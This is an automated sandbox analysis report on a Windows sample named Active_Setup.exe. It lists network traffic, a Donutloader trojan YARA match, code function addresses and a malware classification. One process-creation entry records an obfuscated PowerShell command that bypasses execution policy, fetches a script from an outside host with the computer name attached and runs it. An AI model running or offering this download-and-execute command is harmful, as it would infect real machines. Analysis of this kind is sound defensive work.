              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0098E879 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0098E879
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB74400_2_00FB7440
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010741000_2_01074100
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010441600_2_01044160
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE60700_2_00FE6070
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010301E00_2_010301E0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FD40100_2_00FD4010
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010341F00_2_010341F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE619E0_2_00FE619E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB61800_2_00FB6180
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB61600_2_00FB6160
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103E0C00_2_0103E0C0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB61300_2_00FB6130
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB61200_2_00FB6120
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB61000_2_00FB6100
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FCC1000_2_00FCC100
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0102E3500_2_0102E350
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010983CA0_2_010983CA
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB63F00_2_00FB63F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0107421B0_2_0107421B
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010382300_2_01038230
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB63500_2_00FB6350
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103E2B00_2_0103E2B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010942CB0_2_010942CB
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010322F00_2_010322F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103C2F00_2_0103C2F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010305A00_2_010305A0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010745B00_2_010745B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FD65C00_2_00FD65C0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010344400_2_01034440
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB65A00_2_00FB65A0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010324700_2_01032470
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0102E7200_2_0102E720
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB66B00_2_00FB66B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010327B00_2_010327B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103C7E00_2_0103C7E0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB66000_2_00FB6600
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0102C6000_2_0102C600
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE27F00_2_00FE27F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010346400_2_01034640
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010946D70_2_010946D7
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010749080_2_01074908
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010989100_2_01098910
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010329300_2_01032930
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010309500_2_01030950
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010789500_2_01078950
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0104A9600_2_0104A960
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010349700_2_01034970
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFC8600_2_00FFC860
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103C9D00_2_0103C9D0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE48100_2_00FE4810
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010348300_2_01034830
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010388300_2_01038830
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB69B00_2_00FB69B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103E8F00_2_0103E8F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01074B0E0_2_01074B0E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101AB900_2_0101AB90
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE4A400_2_00FE4A40
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01032BF00_2_01032BF0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFCB900_2_00FFCB90
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0100AA800_2_0100AA80
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01034AF00_2_01034AF0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01094AF70_2_01094AF7
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB4CF00_2_00FB4CF0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01038D100_2_01038D10
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01068D600_2_01068D60
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0105EDD00_2_0105EDD0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103AC200_2_0103AC20
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01050C600_2_01050C60
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FECEE00_2_00FECEE0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101EF400_2_0101EF40
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01032F460_2_01032F46
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01032F480_2_01032F48
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE0E600_2_00FE0E60
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01032FB60_2_01032FB6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01034FC00_2_01034FC0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01038FD00_2_01038FD0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFCE100_2_00FFCE10
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB6FB00_2_00FB6FB0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103CE500_2_0103CE50
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01030E700_2_01030E70
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0100AEA00_2_0100AEA0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01032EA00_2_01032EA0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01050EA00_2_01050EA0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFCF300_2_00FFCF30
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010331700_2_01033170
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFD0500_2_00FFD050
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0100B1F80_2_0100B1F8
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010990080_2_01099008
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE51200_2_00FE5120
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103D3000_2_0103D300
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB72E00_2_00FB72E0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB72900_2_00FB7290
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB72800_2_00FB7280
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010393900_2_01039390
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010313A00_2_010313A0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101B3B00_2_0101B3B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010513E00_2_010513E0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010372100_2_01037210
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010332160_2_01033216
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010332180_2_01033218
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB73600_2_00FB7360
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101F5000_2_0101F500
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103D5200_2_0103D520
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0100B5300_2_0100B530
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0108D55D0_2_0108D55D
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101B5B00_2_0101B5B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010495B00_2_010495B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010315F00_2_010315F0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010334300_2_01033430
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010354900_2_01035490
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010514990_2_01051499
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB75400_2_00FB7540
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FFD5300_2_00FFD530
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103D7400_2_0103D740
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB76600_2_00FB7660
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010376400_2_01037640
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010836400_2_01083640
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010336700_2_01033670
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0104B6700_2_0104B670
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010096C00_2_010096C0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010639100_2_01063910
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE58D00_2_00FE58D0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010359800_2_01035980
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0107B9B00_2_0107B9B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101D8700_2_0101D870
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010338C00_2_010338C0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010098D00_2_010098D0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB5AF00_2_00FB5AF0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01031BB00_2_01031BB0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01093A220_2_01093A22
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01033A600_2_01033A60
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01037A700_2_01037A70
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103BA900_2_0103BA90
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0101BAC00_2_0101BAC0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE5CA00_2_00FE5CA0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE3DF90_2_00FE3DF9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FE3DD00_2_00FE3DD0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01035C500_2_01035C50
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB5EE00_2_00FB5EE0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0108BF220_2_0108BF22
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0104BF500_2_0104BF50
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01037F600_2_01037F60
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01073F700_2_01073F70
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01033F900_2_01033F90
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01039E600_2_01039E60
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01097E860_2_01097E86
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB5F500_2_00FB5F50
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01033ED00_2_01033ED0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0103DED00_2_0103DED0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB5F200_2_00FB5F20
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01099EE80_2_01099EE8
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01093EF70_2_01093EF7
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009402B90_2_009402B9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0098E8790_2_0098E879
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009720860_2_00972086
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0094A0160_2_0094A016
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009400000_2_00940000
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095E0450_2_0095E045
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0094E11C0_2_0094E11C
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009582920_2_00958292
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009803A60_2_009803A6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096A5D60_2_0096A5D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097A5160_2_0097A516
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095268E0_2_0095268E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009806A60_2_009806A6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009506C40_2_009506C4
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009586F30_2_009586F3
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097C6160_2_0097C616
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009446260_2_00944626
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095A6460_2_0095A646
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096C6750_2_0096C675
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009628860_2_00962886
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0094A8860_2_0094A886
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009789F60_2_009789F6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009529F60_2_009529F6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009609560_2_00960956
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00948AA60_2_00948AA6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097EAAC0_2_0097EAAC
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00980A260_2_00980A26
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095EC860_2_0095EC86
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00978C560_2_00978C56
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00980DC60_2_00980DC6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095CDF90_2_0095CDF9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0094AD160_2_0094AD16
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097CEC60_2_0097CEC6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00946FE60_2_00946FE6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095EF560_2_0095EF56
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096AF760_2_0096AF76
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009450260_2_00945026
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096F02C0_2_0096F02C
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096917B0_2_0096917B
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009772EE0_2_009772EE
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009633860_2_00963386
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009673D60_2_009673D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009793D60_2_009793D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009593610_2_00959361
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009514480_2_00951448
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096B7D60_2_0096B7D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095D70C0_2_0095D70C
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096F8880_2_0096F888
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095B8D60_2_0095B8D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095F8360_2_0095F836
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009478460_2_00947846
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095984E0_2_0095984E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009459D60_2_009459D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00957A300_2_00957A30
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0095BBF60_2_0095BBF6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00963B1C0_2_00963B1C
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0097DB3D0_2_0097DB3D
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0094FB200_2_0094FB20
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00971C810_2_00971C81
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00949CB60_2_00949CB6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00947CD60_2_00947CD6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00957CDC0_2_00957CDC
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0096BDB80_2_0096BDB8
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00977D0F0_2_00977D0F
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00973E960_2_00973E96
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00951F050_2_00951F05
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00979F460_2_00979F46
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0094BF760_2_0094BF76
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02E65BC54_2_02E65BC5
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FC57B0 appears 31 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FE9B40 appears 83 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 01081A00 appears 51 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00949636 appears 76 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00954F66 appears 77 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FC67B0 appears 37 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 0108B917 appears 33 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FE9BA0 appears 199 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FE8A10 appears 71 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 01083EF0 appears 714 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 01088438 appears 68 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FDDFF0 appears 286 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FF4C20 appears 47 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FF82E0 appears 38 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FDD1E0 appears 39 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FC1180 appears 123 times
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: String function: 00FC10F0 appears 133 times
              Source: Active_Setup.exeStatic PE information: invalid certificate
              Source: Active_Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@4/3
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FC64B0 GetLastError,_strerror,_strncpy,FormatMessageA,curl_msnprintf,_strrchr,_strrchr,GetLastError,SetLastError,0_2_00FC64B0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_009409C9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_009409C9
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Users\user\Desktop\Active_Setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\EUDLOG_LOG_H_XXX_
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te23itw2.y2t.ps1Jump to behavior
              Source: Active_Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Active_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Active_Setup.exe, 00000000.00000003.1790797946.0000000003A95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Active_Setup.exeReversingLabs: Detection: 18%
              Source: Active_Setup.exeString found in binary or memory: set-addPolicy
              Source: Active_Setup.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\Active_Setup.exeFile read: C:\Users\user\Desktop\Active_Setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Active_Setup.exe "C:\Users\user\Desktop\Active_Setup.exe"
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;Jump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeSection loaded: wldp.dllJump to behavior
